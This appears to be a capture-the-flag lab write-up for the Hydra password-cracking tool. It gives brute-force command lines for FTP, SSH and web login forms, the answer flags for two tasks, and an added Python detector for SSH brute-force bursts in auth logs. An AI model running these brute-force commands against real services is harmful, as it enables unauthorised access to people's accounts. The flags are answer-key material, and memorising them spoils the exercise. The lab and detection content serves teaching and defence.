Hydra
Mar 2, 2024
Task 1: Hydra Introduction
Hydra is an online password cracking tool which uses brute force.
Task 2: Using Hydra
- Use Hydra for brute force attacks on services such as FTP and SSH.
- FTP Command:
hydra -l user -P passlist.txt ftp://MACHINE_IP
- SSH Command:
hydra -l <username> -P <full path to pass> MACHINE_IP -t 4 ssh
  -l : SSH username
  -P : List of passwords
  -t : Number of threads
- Hydra can also brute force web forms.
- Command for POST Web Form:
sudo hydra -l <username> -P <wordlist> MACHINE_IP http-post-form "<path>:<login_credentials>:<invalid_response>"
  -l : Username for web form login
  -P : Password list
  http-post-form : Form type is POST
  <path> : Login page URL
  <login_credentials> : Username and password for login
  <invalid_response> : Part of response when login fails
  -V : Verbose output for each attempt
- Example Command for POST Web Form:
hydra -l <username> -P <wordlist> MACHINE_IP http-post-form "/:username=^USER^&password=^PASS^:F=incorrect" -V
Use Hydra to bruteforce molly’s web password. What is flag 1?
Ans: THM{2673a7dd116de68e85c48ec0b1f2612e}
Use Hydra to bruteforce molly’s SSH password. What is flag 2?
Ans: THM{c8eeb0468febbadea859baeb33b2541b}
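
The defender's side of the SSH task above, as an added example that is not part of the original write-up: a Hydra run with one username and a password list appears in the sshd auth log as a burst of failed passwords for one account from one source, and a later "Accepted" line for the same pair means the guess worked. The log lines, threshold, window and year below are constructed assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sshd auth-log lines for illustration (not taken from the room).
SAMPLE_LOG = """\
Mar  2 10:15:01 host sshd[2101]: Failed password for molly from 10.10.10.5 port 40022 ssh2
Mar  2 10:15:01 host sshd[2102]: Failed password for molly from 10.10.10.5 port 40024 ssh2
Mar  2 10:15:02 host sshd[2103]: Failed password for molly from 10.10.10.5 port 40026 ssh2
Mar  2 10:15:02 host sshd[2104]: Failed password for molly from 10.10.10.5 port 40028 ssh2
Mar  2 10:15:03 host sshd[2105]: Failed password for molly from 10.10.10.5 port 40030 ssh2
Mar  2 10:15:03 host sshd[2106]: Failed password for molly from 10.10.10.5 port 40032 ssh2
Mar  2 10:15:04 host sshd[2107]: Accepted password for molly from 10.10.10.5 port 40034 ssh2
Mar  2 10:20:00 host sshd[2110]: Failed password for alice from 10.10.10.9 port 51000 ssh2
Mar  2 10:31:10 host sshd[2111]: Failed password for alice from 10.10.10.9 port 51002 ssh2
Mar  2 10:42:30 host sshd[2112]: Failed password for invalid user admin from 10.10.10.9 port 51004 ssh2
"""

EVENT = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ [\d:]{8}) \S+ sshd\[\d+\]: "
    r"(?P<kind>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\S+) port \d+"
)

def detect_bruteforce(log_text, threshold=5, window=timedelta(seconds=60), year=2024):
    """Map (ip, user) -> True if a login succeeded after the burst, else False."""
    recent = defaultdict(deque)  # (ip, user) -> timestamps of failures inside the window
    flagged = {}
    for line in log_text.splitlines():
        m = EVENT.match(line)
        if not m:
            continue
        key = (m["ip"], m["user"])
        if m["kind"] == "Accepted":
            if key in flagged:          # success after a flagged burst
                flagged[key] = True
            continue
        # Syslog timestamps carry no year, so one is assumed.
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        q = recent[key]
        q.append(ts)
        while ts - q[0] > window:       # drop failures older than the window
            q.popleft()
        if len(q) >= threshold:
            flagged.setdefault(key, False)
    return flagged

if __name__ == "__main__":
    for (ip, user), success in detect_bruteforce(SAMPLE_LOG).items():
        print(f"brute force {ip} -> {user}, login succeeded afterwards: {success}")
```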